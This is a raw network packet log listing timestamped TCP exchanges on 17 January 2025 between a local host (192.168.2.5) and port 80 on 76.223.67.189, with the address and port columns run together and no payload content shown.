                                                                                                                        Jan 17, 2025 06:53:40.416623116 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:40.421494007 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:40.857711077 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:40.862704039 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:40.963970900 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:40.964164019 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:40.969918013 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:41.389132023 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:41.394208908 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:41.495105982 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:41.495629072 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:41.500777006 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:41.905000925 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:41.910432100 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:42.010983944 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:42.012953043 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:42.017997026 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:42.404814005 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:42.410219908 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:42.510662079 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:42.510802984 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:42.515782118 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:42.889292002 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:42.894350052 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:42.994890928 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:42.995212078 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:43.000494957 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:43.373269081 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:43.379481077 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:43.478837013 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:43.479027033 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:43.484045029 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:43.842629910 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:43.847958088 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:43.948839903 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:43.949166059 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:43.954399109 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:44.295281887 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:44.300894976 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:44.401406050 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:44.401693106 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:44.406591892 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:44.733510971 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:44.738823891 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:44.838865995 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:44.843252897 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:44.848189116 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:45.170202017 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:45.175062895 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:45.275662899 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:45.278314114 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:45.283220053 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:45.592263937 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:45.597414017 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:45.697760105 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:45.698085070 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:45.702914953 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:45.998400927 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:46.003592014 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:46.104008913 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:46.104304075 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:46.109632969 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:46.404712915 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:46.409748077 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:46.510498047 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:46.510782003 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:46.515614986 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:46.795207024 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:46.800208092 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:46.922837019 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:46.923132896 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:46.928016901 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:47.201355934 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:47.207046986 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:47.307749987 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:47.308022022 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:47.312920094 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:47.576476097 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:47.581864119 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:47.687115908 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:47.687410116 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:47.692291975 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:47.951613903 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:47.958117008 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:48.057534933 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:48.057723999 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:48.062601089 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:48.310834885 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:48.315920115 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:48.418662071 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:48.418865919 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:48.426172018 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:48.654884100 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:48.659853935 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:48.760708094 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:48.761013031 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:48.765919924 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:48.998632908 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:49.003973007 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:49.104809999 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:49.105189085 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:49.111036062 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:49.326364994 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:49.331326962 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:49.432244062 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:49.432426929 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:49.437453985 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:49.654653072 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:49.659620047 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:49.760078907 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:49.760402918 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:49.765240908 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:49.967123985 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:49.972048998 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:50.072853088 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:50.073163986 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:50.078049898 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:50.279578924 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:50.284538984 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:50.385071039 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:50.385283947 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:50.390136957 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:50.576453924 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:50.581413984 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:50.681776047 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:50.681955099 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:50.686783075 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:50.873351097 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:50.878283978 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:50.978755951 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:50.978926897 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:50.983757973 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:51.170278072 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:51.176578045 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:51.277223110 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:51.277388096 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:51.282232046 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:51.451720953 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:51.457189083 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:51.557368994 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:51.557598114 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:51.562565088 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:51.732670069 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:51.737622023 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:51.838217974 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:51.838378906 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:51.843219995 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:52.014230013 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:52.019440889 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:52.120121956 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:52.120263100 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:52.125232935 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:52.279494047 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:52.284429073 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:52.384934902 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:52.385143042 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:52.390084982 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:52.545334101 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:52.550559044 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:52.651191950 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:52.651429892 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:52.656480074 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:52.810954094 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:52.815958023 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:52.916527033 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:52.916985989 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:52.921869993 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:53.060952902 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:53.065854073 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:53.166299105 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:53.166680098 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:53.171647072 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:53.311033964 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:53.315954924 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:53.416815042 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:53.417332888 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:53.422449112 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:53.561100006 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:53.566036940 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:53.666480064 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:53.666790009 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:53.671763897 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:53.795171976 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:53.800038099 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:53.900461912 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:53.900774956 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:53.905730009 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.029725075 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:54.034688950 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.135875940 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.136516094 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:54.141436100 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.265444994 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:54.270327091 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.371282101 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.371535063 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:54.376424074 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.498302937 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:54.503253937 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.603743076 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.603900909 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:54.608768940 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.716969967 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:54.721894026 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.823019981 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.823183060 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:54.828807116 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:54.935894966 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:54.942025900 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.041356087 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.041785002 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.048243046 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.154629946 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.160001040 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.260564089 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.261276960 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.266128063 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.373311043 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.378209114 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.478616953 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.478933096 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.483830929 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.576464891 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.581537962 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.681890011 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.682291031 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.687455893 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.779604912 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.784856081 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.890722990 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.890997887 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.896106005 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:55.982745886 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:55.988147020 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.088217974 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.088989973 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.093897104 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.185915947 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.190876961 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.291475058 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.291785002 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.296885014 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.388959885 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.393944979 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.495758057 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.496191025 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.501118898 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.592538118 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.598315954 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.697911978 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.698265076 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.703130960 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.779576063 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.785118103 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.891376019 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.891700029 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.897231102 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:56.982624054 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:56.988156080 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.089085102 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.089426041 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.094279051 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.170120955 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.175163031 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.275569916 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.275896072 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.280770063 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.357774019 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.362843990 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.463545084 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.463768005 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.468687057 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.545304060 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.551295996 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.652070999 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.652381897 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.657321930 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.732644081 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.737677097 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.838203907 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.838380098 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.843265057 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:57.904496908 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:57.909442902 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.010360003 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.010626078 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:58.015485048 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.076441050 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:58.081451893 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.186618090 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.186952114 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:58.191812992 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.248420000 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:58.253385067 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.353944063 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.354181051 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:58.359029055 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.420393944 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:58.425287962 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.526032925 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.526278973 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:58.531204939 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.592437983 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:58.597529888 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.698016882 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.698406935 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:58.703329086 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.764004946 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:58.768929005 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.869761944 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.870070934 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:58.874941111 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:58.935750961 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:58.940778017 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.043087959 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.043437004 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:59.048297882 CET804985776.223.67.189192.168.2.5
                                                                                                                        Jan 17, 2025 06:53:59.107963085 CET4985780192.168.2.576.223.67.189
                                                                                                                        Jan 17, 2025 06:53:59.113851070 CET804985776.223.67.189192.168.2.5
